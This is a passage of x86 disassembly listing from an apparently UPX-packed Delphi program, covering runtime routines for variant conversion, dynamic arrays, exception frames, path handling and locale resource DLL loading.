mov fs:[eax], edx
push offset loc_403E0F
loc_403DFF: ; CODE XREF: UPX0:00403E0D�j
lea eax, [ebp-10h]
call sub_404054
retn
; ---------------------------------------------------------------------------
loc_403E08: ; DATA XREF: sub_403DAC+26�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_403DFF
; ---------------------------------------------------------------------------
loc_403E0F: ; CODE XREF: UPX0:00403E07�j
; DATA XREF: UPX0:00403DFA�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E18 proc near ; CODE XREF: sub_403E30+25�p
; sub_403E30+7C�p
push ebx
xor ebx, ebx
cmp word ptr [edx], 101h
jnz short loc_403E29
call sub_403DAC
mov bl, 1
loc_403E29: ; CODE XREF: sub_403E18+8�j
mov eax, ebx
pop ebx
retn
sub_403E18 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E30 proc near ; CODE XREF: UPX0:00403DED�p
; sub_403F24+5E�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
mov ax, [ebx]
sub ax, 100h
jz short loc_403E4F
dec ax
jz short loc_403E99
jmp short loc_403EA6
; ---------------------------------------------------------------------------
loc_403E4F: ; CODE XREF: sub_403E30+16�j
mov edx, esi
mov eax, ebx
mov ecx, edi
call sub_403E18
test al, al
jnz short loc_403ECD
mov word ptr [ebp+var_10], 0
push edi
push 0
push 400h
push esi
lea eax, [ebp+var_10]
push eax
call sub_4011C8
test eax, eax
jz short loc_403E7F
call sub_403CBC
; ---------------------------------------------------------------------------
loc_403E7F: ; CODE XREF: sub_403E30+48�j
mov eax, ebx
call sub_403CCC
mov eax, [ebp+var_10]
mov [ebx], eax
mov eax, [ebp+var_8]
mov [ebx+8], eax
mov eax, [ebp+var_4]
mov [ebx+0Ch], eax
jmp short loc_403ECD
; ---------------------------------------------------------------------------
loc_403E99: ; CODE XREF: sub_403E30+1B�j
mov edx, esi
mov eax, ebx
mov ecx, edi
call sub_403DAC
jmp short loc_403ECD
; ---------------------------------------------------------------------------
loc_403EA6: ; CODE XREF: sub_403E30+1D�j
mov edx, esi
mov eax, ebx
mov ecx, edi
call sub_403E18
test al, al
jnz short loc_403ECD
push edi
push 0
push 400h
push esi
push ebx
call sub_4011C8
test eax, eax
jz short loc_403ECD
call sub_403CBC
; ---------------------------------------------------------------------------
loc_403ECD: ; CODE XREF: sub_403E30+2C�j
; sub_403E30+67�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403ED4 proc near ; CODE XREF: sub_403F24+96�p
; sub_403F24+C3�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, eax
xor eax, eax
mov [ebp+var_4], eax
mov eax, [edx+8]
lea edx, [ebp+var_4]
call sub_403C0C
mov eax, ebx
call sub_403CCC
mov word ptr [ebx], 100h
mov eax, [ebp+var_4]
mov [ebx+8], eax
pop ebx
pop ecx
pop ebp
retn
sub_403ED4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403F04 proc near ; CODE XREF: sub_403F24+30�p
; sub_403F24+43�p
push ebx
push esi
mov ebx, eax
mov eax, [edx+8]
call sub_403C30
mov esi, eax
mov eax, ebx
call sub_403CCC
mov word ptr [ebx], 8
mov [ebx+8], esi
pop esi
pop ebx
retn
sub_403F04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F24 proc near ; CODE XREF: sub_404018+22�p
; sub_409BA8+12D�p
var_14 = dword ptr -14h
var_10 = word ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
mov [ebp+var_14], eax
mov ax, [edx]
mov ebx, ecx
cmp bx, ax
jnz short loc_403F45
mov eax, [ebp+var_14]
call sub_403D10
jmp loc_404013
; ---------------------------------------------------------------------------
loc_403F45: ; CODE XREF: sub_403F24+12�j
cmp ax, 100h
jnz short loc_403FA4
cmp bx, 8
jnz short loc_403F5E
mov eax, [ebp+var_14]
call sub_403F04
jmp loc_404013
; ---------------------------------------------------------------------------
loc_403F5E: ; CODE XREF: sub_403F24+2B�j
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
call sub_403F04
xor eax, eax
push ebp
push offset loc_403F9D
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_10]
mov eax, [ebp+var_14]
mov ecx, ebx
call sub_403E30
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404013
loc_403F94: ; CODE XREF: sub_403F24+7E�j
lea eax, [ebp+var_10]
call sub_403CCC
retn
; ---------------------------------------------------------------------------
loc_403F9D: ; DATA XREF: sub_403F24+4B�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_403F94
; ---------------------------------------------------------------------------
loc_403FA4: ; CODE XREF: sub_403F24+25�j
cmp bx, 100h
jnz short loc_404009
cmp ax, 101h
jz short loc_404009
cmp ax, 8
jnz short loc_403FC1
mov eax, [ebp+var_14]
call sub_403ED4
jmp short loc_404013
; ---------------------------------------------------------------------------
loc_403FC1: ; CODE XREF: sub_403F24+91�j
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
mov cx, 8
call sub_403E30
xor eax, eax
push ebp
push offset loc_404002
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_10]
mov eax, [ebp+var_14]
call sub_403ED4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404013
loc_403FF9: ; CODE XREF: sub_403F24+E3�j
lea eax, [ebp+var_10]
call sub_403CCC
retn
; ---------------------------------------------------------------------------
loc_404002: ; DATA XREF: sub_403F24+B2�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_403FF9
; ---------------------------------------------------------------------------
loc_404009: ; CODE XREF: sub_403F24+85�j
; sub_403F24+8B�j
mov eax, [ebp+var_14]
mov ecx, ebx
call sub_403E30
loc_404013: ; CODE XREF: sub_403F24+1C�j
; sub_403F24+35�j ...
pop ebx
mov esp, ebp
pop ebp
retn
sub_403F24 endp
; =============== S U B R O U T I N E =======================================
sub_404018 proc near ; CODE XREF: sub_40697C+A�p
var_14 = word ptr -14h
var_C = dword ptr -0Ch
cmp word ptr [edx], 100h
jnz short loc_404027
mov edx, [edx+8]
jmp sub_40321C
; ---------------------------------------------------------------------------
loc_404027: ; CODE XREF: sub_404018+5�j
push ebx
mov ebx, eax
sub esp, 10h
mov [esp+14h+var_14], 0
mov eax, esp
mov ecx, 100h
call sub_403F24
mov eax, ebx
call sub_4031C8
mov eax, [esp+14h+var_C]
mov [ebx], eax
add esp, 10h
pop ebx
retn
sub_404018 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404054 proc near ; CODE XREF: sub_40387C+86�p
; UPX0:00403E02�p ...
push eax
call sub_403CCC
pop eax
retn
sub_404054 endp
; =============== S U B R O U T I N E =======================================
sub_40405C proc near ; CODE XREF: sub_403DAC+1E�p
cmp word ptr [eax], 8
jb short locret_40407C
push dword ptr [eax+0Ch]
push dword ptr [eax+8]
push dword ptr [eax+4]
push dword ptr [eax]
mov word ptr [eax], 0
mov edx, esp
call sub_403D10
add esp, 10h
locret_40407C: ; CODE XREF: sub_40405C+4�j
retn
sub_40405C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404080 proc near ; CODE XREF: sub_404088�p
; sub_40A848+19C�p
test eax, eax
jz short locret_404087
mov eax, [eax-4]
locret_404087: ; CODE XREF: sub_404080+2�j
retn
sub_404080 endp
; =============== S U B R O U T I N E =======================================
sub_404088 proc near ; CODE XREF: sub_40A848+1BC�p
; sub_40A848+34D�p
call sub_404080
dec eax
retn
sub_404088 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404090 proc near ; CODE XREF: sub_4040B0+104�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_403A8C
pop ebp
retn 4
sub_404090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4040A0 proc near ; CODE XREF: sub_4040B0+AE�p
jmp sub_40387C
sub_4040A0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4040A8 proc near ; CODE XREF: sub_4040B0+2F�p
call sub_404248
retn
sub_4040A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040B0 proc near ; CODE XREF: sub_4040B0+171�p
; sub_40423C+5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov ebx, [ebp+var_4]
mov ebx, [ebx]
mov eax, [ebp+arg_0]
mov edi, [eax]
test edi, edi
jg short loc_4040E9
test edi, edi
jge short loc_4040DA
mov al, 4
call sub_4025D4
; ---------------------------------------------------------------------------
loc_4040DA: ; CODE XREF: sub_4040B0+21�j
mov eax, [ebp+var_4]
mov edx, esi
call sub_4040A8
jmp loc_404231
; ---------------------------------------------------------------------------
loc_4040E9: ; CODE XREF: sub_4040B0+1D�j
xor eax, eax
mov [ebp+var_10], eax
test ebx, ebx
jz short loc_4040FD
sub ebx, 4
mov eax, [ebx]
mov [ebp+var_10], eax
sub ebx, 4
loc_4040FD: ; CODE XREF: sub_4040B0+40�j
xor eax, eax
mov al, [esi+1]
add esi, eax
mov eax, [esi+2]
mov [ebp+var_18], eax
mov eax, [esi+6]
test eax, eax
jz short loc_404115
mov esi, [eax]
jmp short loc_404117
; ---------------------------------------------------------------------------
loc_404115: ; CODE XREF: sub_4040B0+5F�j
xor esi, esi
loc_404117: ; CODE XREF: sub_4040B0+63�j
mov eax, edi
imul [ebp+var_18]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cdq
idiv edi
cmp eax, [ebp+var_18]
jz short loc_404131
mov al, 4
call sub_4025D4
; ---------------------------------------------------------------------------
loc_404131: ; CODE XREF: sub_4040B0+78�j
add [ebp+var_1C], 8
test ebx, ebx
jz short loc_40413E
cmp dword ptr [ebx], 1
jnz short loc_404173
loc_40413E: ; CODE XREF: sub_4040B0+87�j
mov [ebp+var_20], ebx
cmp edi, [ebp+var_10]
jge short loc_404163
test esi, esi
jz short loc_404163
mov eax, ebx
add eax, 8
mov edx, edi
imul edx, [ebp+var_18]
add eax, edx
mov ecx, [ebp+var_10]
sub ecx, edi
mov edx, esi
call sub_4040A0
loc_404163: ; CODE XREF: sub_4040B0+94�j
; sub_4040B0+98�j
lea eax, [ebp+var_20]
mov edx, [ebp+var_1C]
call sub_402584
mov ebx, [ebp+var_20]
jmp short loc_4041D1
; ---------------------------------------------------------------------------
loc_404173: ; CODE XREF: sub_4040B0+8C�j
dec dword ptr [ebx]
mov eax, [ebp+var_1C]
call sub_402554
mov ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
cmp edi, [ebp+var_14]
jge short loc_40418D
mov [ebp+var_14], edi
loc_40418D: ; CODE XREF: sub_4040B0+D8�j
test esi, esi
jz short loc_4041BB
mov edx, [ebp+var_14]
imul edx, [ebp+var_18]
mov eax, ebx
add eax, 8
xor ecx, ecx
call sub_4026A0
mov eax, [ebp+var_14]
push eax
mov edx, [ebp+var_4]
mov edx, [edx]
mov eax, ebx
add eax, 8
mov ecx, esi
call sub_404090
jmp short loc_4041D1
; ---------------------------------------------------------------------------
loc_4041BB: ; CODE XREF: sub_4040B0+DF�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, ebx
add edx, 8
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_402660
loc_4041D1: ; CODE XREF: sub_4040B0+C1�j
; sub_4040B0+109�j
mov dword ptr [ebx], 1
add ebx, 4
mov [ebx], edi
add ebx, 4
mov edx, edi
sub edx, [ebp+var_10]
imul edx, [ebp+var_18]
mov eax, [ebp+var_18]
imul eax, [ebp+var_10]
add eax, ebx
xor ecx, ecx
call sub_4026A0
cmp [ebp+var_8], 1
jle short loc_40422C
add [ebp+arg_0], 4
dec [ebp+var_8]
dec edi
test edi, edi
jl short loc_40422C
inc edi
mov [ebp+var_C], 0
loc_404212: ; CODE XREF: sub_4040B0+17A�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_C]
lea eax, [ebx+eax*4]
mov ecx, [ebp+var_8]
mov edx, esi
call sub_4040B0
inc [ebp+var_C]
dec edi
jnz short loc_404212
loc_40422C: ; CODE XREF: sub_4040B0+14C�j
; sub_4040B0+158�j
mov eax, [ebp+var_4]
mov [eax], ebx
loc_404231: ; CODE XREF: sub_4040B0+34�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4040B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40423C proc near ; CODE XREF: sub_40A848+1B1�p
var_4 = dword ptr -4
push esp
add [esp+4+var_4], 4
call sub_4040B0
retn
sub_40423C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404248 proc near ; CODE XREF: sub_40387C+DA�p
; sub_4040A8�p ...
mov ecx, [eax]
test ecx, ecx
jz short locret_404281
mov dword ptr [eax], 0
lock dec dword ptr [ecx-8]
jnz short locret_404281
push eax
mov eax, ecx
xor ecx, ecx
mov cl, [edx+1]
mov edx, [edx+ecx+6]
test edx, edx
jz short loc_404278
mov ecx, [eax-4]
test ecx, ecx
jz short loc_404278
mov edx, [edx]
call sub_40387C
loc_404278: ; CODE XREF: sub_404248+20�j
; sub_404248+27�j
sub eax, 8
call sub_40256C
pop eax
locret_404281: ; CODE XREF: sub_404248+4�j
; sub_404248+10�j
retn
sub_404248 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404284 proc near ; CODE XREF: sub_403970+EF�p
; sub_403A8C+DD�p
push ebx
mov ebx, [eax]
test edx, edx
jz short loc_40428F
lock inc dword ptr [edx-8]
loc_40428F: ; CODE XREF: sub_404284+5�j
test ebx, ebx
jz short loc_4042A7
lock dec dword ptr [ebx-8]
jnz short loc_4042A7
push eax
push edx
mov edx, ecx
inc dword ptr [ebx-8]
call sub_404248
pop edx
pop eax
loc_4042A7: ; CODE XREF: sub_404284+D�j
; sub_404284+13�j
mov [eax], edx
pop ebx
retn
sub_404284 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4042AC proc near ; CODE XREF: sub_40300C+25�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
add esp, 0FFFFFFE4h
push 1Ch
lea edx, [esp+20h+var_1C]
push edx
push eax
call sub_401190 ; VirtualQuery
cmp [esp+1Ch+var_C], 1000h
jnz short loc_4042CC
mov eax, [esp+1Ch+var_18]
jmp short loc_4042CE
; ---------------------------------------------------------------------------
loc_4042CC: ; CODE XREF: sub_4042AC+18�j
xor eax, eax
loc_4042CE: ; CODE XREF: sub_4042AC+1E�j
add esp, 1Ch
retn
sub_4042AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4042D4 proc near ; CODE XREF: sub_40478C+2B�p
; sub_407704+EC�p ...
mov edx, off_40B018
test edx, edx
jz short locret_4042F7
loc_4042DE: ; CODE XREF: sub_4042D4+21�j
cmp eax, [edx+4]
jz short loc_4042ED
cmp eax, [edx+8]
jz short loc_4042ED
cmp eax, [edx+0Ch]
jnz short loc_4042F1
loc_4042ED: ; CODE XREF: sub_4042D4+D�j
; sub_4042D4+12�j
mov eax, [edx+10h]
retn
; ---------------------------------------------------------------------------
loc_4042F1: ; CODE XREF: sub_4042D4+17�j
mov edx, [edx]
test edx, edx
jnz short loc_4042DE
locret_4042F7: ; CODE XREF: sub_4042D4+8�j
retn
sub_4042D4 endp
; =============== S U B R O U T I N E =======================================
sub_4042F8 proc near ; CODE XREF: sub_40430C+80�p
; sub_40430C+93�p ...
jmp short loc_404300
; ---------------------------------------------------------------------------
loc_4042FA: ; CODE XREF: sub_4042F8+11�j
push eax
call sub_4010D0 ; CharNextA
loc_404300: ; CODE XREF: sub_4042F8�j
mov dl, [eax]
test dl, dl
jz short locret_40430B
cmp dl, 5Ch
jnz short loc_4042FA
locret_40430B: ; CODE XREF: sub_4042F8+C�j
retn
sub_4042F8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40430C proc near ; CODE XREF: sub_4044B4+88�p
var_24F = byte ptr -24Fh
var_14A = byte ptr -14Ah
var_11E = byte ptr -11Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFDB0h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
push offset dword_404490
call sub_401120 ; GetModuleHandleA
mov ebx, eax
test ebx, ebx
jz short loc_404371
push offset aGetlongpathnam ; "GetLongPathNameA"
push ebx
call sub_401128 ; GetProcAddress
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_404371
push 105h
lea eax, [ebp+var_24F]
push eax
mov eax, [ebp+var_4]
push eax
call [ebp+var_C]
test eax, eax
jz short loc_404371
lea eax, [ebp+var_24F]
push eax
mov eax, [ebp+var_4]
push eax
call sub_401150 ; lstrcpyA
jmp loc_404486
; ---------------------------------------------------------------------------
loc_404371: ; CODE XREF: sub_40430C+23�j
; sub_40430C+37�j ...
mov eax, [ebp+var_4]
cmp byte ptr [eax], 5Ch
jnz short loc_4043B1
mov eax, [ebp+var_4]
cmp byte ptr [eax+1], 5Ch
jnz loc_404486
mov eax, [ebp+var_4]
add eax, 2
call sub_4042F8
mov ebx, eax
cmp byte ptr [ebx], 0
jz loc_404486
lea eax, [ebx+1]
call sub_4042F8
mov ebx, eax
cmp byte ptr [ebx], 0
jz loc_404486
jmp short loc_4043B7
; ---------------------------------------------------------------------------
loc_4043B1: ; CODE XREF: sub_40430C+6B�j
mov ebx, [ebp+var_4]
add ebx, 2
loc_4043B7: ; CODE XREF: sub_40430C+A3�j
mov esi, ebx
sub esi, [ebp+var_4]
lea eax, [esi+1]
push eax
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24F]
push eax
call sub_401158 ; lstrcpynA
jmp loc_40446D
; ---------------------------------------------------------------------------
loc_4043D5: ; CODE XREF: sub_40430C+164�j
lea eax, [ebx+1]
call sub_4042F8
mov edi, eax
mov eax, edi
sub eax, ebx
mov edx, eax
add edx, esi
inc edx
cmp edx, 105h
jg loc_404486
inc eax
push eax
push ebx
lea eax, [ebp+var_24F]
add eax, esi
push eax
call sub_401158 ; lstrcpynA
lea eax, [ebp+var_14A]
push eax
lea eax, [ebp+var_24F]
push eax
call sub_4010F0 ; FindFirstFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_404486
push ebx
call sub_4010E8 ; FindClose
lea eax, [ebp+var_11E]
push eax
call sub_401160 ; lstrlenA
lea edx, [esi+1]
add eax, edx
inc eax
cmp eax, 105h
jg short loc_404486
mov [ebp+esi+var_24F], 5Ch
lea eax, [ebp+var_11E]
push eax
lea eax, [ebp+var_24F]
add eax, esi
inc eax
push eax
call sub_401150 ; lstrcpyA
lea eax, [ebp+var_11E]
push eax
call sub_401160 ; lstrlenA
inc eax
add esi, eax
mov ebx, edi
loc_40446D: ; CODE XREF: sub_40430C+C4�j
cmp byte ptr [ebx], 0
jnz loc_4043D5
lea eax, [ebp+var_24F]
push eax
mov eax, [ebp+var_4]
push eax
call sub_401150 ; lstrcpyA
loc_404486: ; CODE XREF: sub_40430C+60�j
; sub_40430C+74�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40430C endp
; ---------------------------------------------------------------------------
dword_404490 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0aGetlongpathnam db 'GetLongPathNameA',0 ; DATA XREF: sub_40430C+25�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044B4 proc near ; CODE XREF: sub_4055A8+1E�p
var_11D = byte ptr -11Dh
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_D = byte ptr -0Dh
var_B = byte ptr -0Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEE0h
push ebx
push esi
mov [ebp+var_4], eax
push 105h
lea eax, [ebp+var_11D]
push eax
push 0
call sub_401118 ; GetModuleFileNameA
mov [ebp+var_12], 0
lea eax, [ebp+var_8]
push eax
push 0F003Fh
push 0
push offset aSoftwareBorl_0 ; "Software\\Borland\\Locales"
push 80000001h
call sub_401178 ; RegOpenKeyExA
test eax, eax
jz short loc_404515
lea eax, [ebp+var_8]
push eax
push 0F003Fh
push 0
push offset aSoftwareBorl_1 ; "Software\\Borland\\Delphi\\Locales"
push 80000001h
call sub_401178 ; RegOpenKeyExA
test eax, eax
jnz short loc_404587
loc_404515: ; CODE XREF: sub_4044B4+41�j
xor eax, eax
push ebp
push offset loc_404580
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_18], 5
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_12]
push eax
push 0
push 0
lea eax, [ebp+var_11D]
call sub_40430C
push eax
mov eax, [ebp+var_8]
push eax
call sub_401180 ; RegQueryValueExA
test eax, eax
jz short loc_404569
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_12]
push eax
push 0
push 0
push offset dword_4046AC
mov eax, [ebp+var_8]
push eax
call sub_401180 ; RegQueryValueExA
loc_404569: ; CODE XREF: sub_4044B4+99�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404587
loc_404576: ; CODE XREF: sub_4044B4+D1�j
mov eax, [ebp+var_8]
push eax
call sub_401170 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_404580: ; DATA XREF: sub_4044B4+64�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_404576
; ---------------------------------------------------------------------------
loc_404587: ; CODE XREF: sub_4044B4+5F�j
; DATA XREF: sub_4044B4+BD�o
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_11D]
push eax
call sub_401150 ; lstrcpyA
push 5
lea eax, [ebp+var_D]
push eax
push 3
call sub_401138 ; GetThreadLocale
push eax
call sub_401110 ; GetLocaleInfoA
xor esi, esi
cmp [ebp+var_11D], 0
jz loc_404668
cmp [ebp+var_D], 0
jnz short loc_4045C9
cmp [ebp+var_12], 0
jz loc_404668
loc_4045C9: ; CODE XREF: sub_4044B4+109�j
lea eax, [ebp+var_11D]
push eax
call sub_401160 ; lstrlenA
mov ebx, eax
lea eax, [ebp+var_11D]
add ebx, eax
jmp short loc_4045E2
; ---------------------------------------------------------------------------
loc_4045E1: ; CODE XREF: sub_4044B4+13B�j
dec ebx
loc_4045E2: ; CODE XREF: sub_4044B4+12B�j
cmp byte ptr [ebx], 2Eh
jz short loc_4045F1
lea eax, [ebp+var_11D]
cmp ebx, eax
jnz short loc_4045E1
loc_4045F1: ; CODE XREF: sub_4044B4+131�j
lea eax, [ebp+var_11D]
cmp ebx, eax
jz short loc_404668
inc ebx
cmp [ebp+var_12], 0
jz short loc_40461E
lea eax, [ebp+var_12]
push eax
push ebx
call sub_401150 ; lstrcpyA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_401140 ; LoadLibraryExA
mov esi, eax
loc_40461E: ; CODE XREF: sub_4044B4+14C�j
test esi, esi
jnz short loc_404668
cmp [ebp+var_D], 0
jz short loc_404668
lea eax, [ebp+var_D]
push eax
push ebx
call sub_401150 ; lstrcpyA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_401140 ; LoadLibraryExA
mov esi, eax
test esi, esi
jnz short loc_404668
mov [ebp+var_B], 0
lea eax, [ebp+var_D]
push eax
push ebx
call sub_401150 ; lstrcpyA
push 2
push 0
lea eax, [ebp+var_11D]
push eax
call sub_401140 ; LoadLibraryExA
mov esi, eax
loc_404668: ; CODE XREF: sub_4044B4+FF�j
; sub_4044B4+10F�j ...
mov eax, esi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4044B4 endp
; ---------------------------------------------------------------------------
aSoftwareBorl_0 db 'Software\Borland\Locales',0 ; DATA XREF: sub_4044B4+30�o
align 4
aSoftwareBorl_1 db 'Software\Borland\Delphi\Locales',0 ; DATA XREF: sub_4044B4+4E�o
dword_4046AC dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046B0 proc near ; CODE XREF: sub_40471C+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, dword_40B01C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404703
loc_4046CA: ; CODE XREF: sub_4046B0+51�j
xor eax, eax
push ebp
push offset loc_4046EB
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4046F5
; ---------------------------------------------------------------------------
loc_4046EB: ; DATA XREF: sub_4046B0+1D�o
jmp sub_402B34
; ---------------------------------------------------------------------------
call sub_402D08
loc_4046F5: ; CODE XREF: sub_4046B0+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4046CA
loc_404703: ; CODE XREF: sub_4046B0+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4046B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40470C proc near ; CODE XREF: sub_4055A8+3E�p
mov edx, off_40B018
mov [eax], edx
mov off_40B018, eax
retn
sub_40470C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40471C proc near ; CODE XREF: sub_403090+A6�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_404780
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_4046B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404787
loc_404749: ; CODE XREF: sub_40471C+69�j
mov eax, [ebp+var_4]
cmp eax, off_40B018
jnz short loc_404760
mov eax, [ebp+var_4]
mov eax, [eax]
mov off_40B018, eax
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404760: ; CODE XREF: sub_40471C+36�j
mov eax, off_40B018
test eax, eax
jz short loc_40477F
loc_404769: ; CODE XREF: sub_40471C+61�j
mov edx, [eax]
cmp edx, [ebp+var_4]
jnz short loc_404779
mov edx, [ebp+var_4]
mov edx, [edx]
mov [eax], edx
jmp short loc_40477F
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_40471C+52�j
mov eax, [eax]
test eax, eax
jnz short loc_404769
loc_40477F: ; CODE XREF: sub_40471C+42�j
; sub_40471C+4B�j ...
retn
; ---------------------------------------------------------------------------
loc_404780: ; DATA XREF: sub_40471C+A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_404749
; ---------------------------------------------------------------------------
loc_404787: ; CODE XREF: sub_40471C:loc_40477F�j
; DATA XREF: sub_40471C+28�o
pop ecx
pop ebp
retn
sub_40471C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40478C proc near ; CODE XREF: sub_402FD0+E�p
; sub_40646C+23�p ...
var_408 = byte ptr -408h
push ebx
push esi
add esp, 0FFFFFC00h
mov esi, edx
mov ebx, eax
test ebx, ebx
jz short loc_4047D9
cmp dword ptr [ebx+4], 10000h
jge short loc_4047CF
push 400h
lea eax, [esp+40Ch+var_408]
push eax
mov eax, [ebx+4]
push eax
mov eax, [ebx]
mov eax, [eax]
call sub_4042D4
push eax
call sub_401148 ; LoadStringA
mov ecx, eax
mov edx, esp
mov eax, esi
call sub_4032B0
jmp short loc_4047D9
; ---------------------------------------------------------------------------
loc_4047CF: ; CODE XREF: sub_40478C+17�j
mov eax, esi
mov edx, [ebx+4]
call sub_403380
loc_4047D9: ; CODE XREF: sub_40478C+E�j
; sub_40478C+41�j
add esp, 400h
pop esi
pop ebx
retn
sub_40478C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4047E4 proc near ; CODE XREF: sub_40387C+C9�p
; sub_409AA8+29�p ...
mov edx, [eax]
test edx, edx
jz short locret_4047F8
mov dword ptr [eax], 0
push eax
push edx
mov eax, [edx]
call dword ptr [eax+8]
pop eax
locret_4047F8: ; CODE XREF: sub_4047E4+4�j
retn
sub_4047E4 endp
; ---------------------------------------------------------------------------
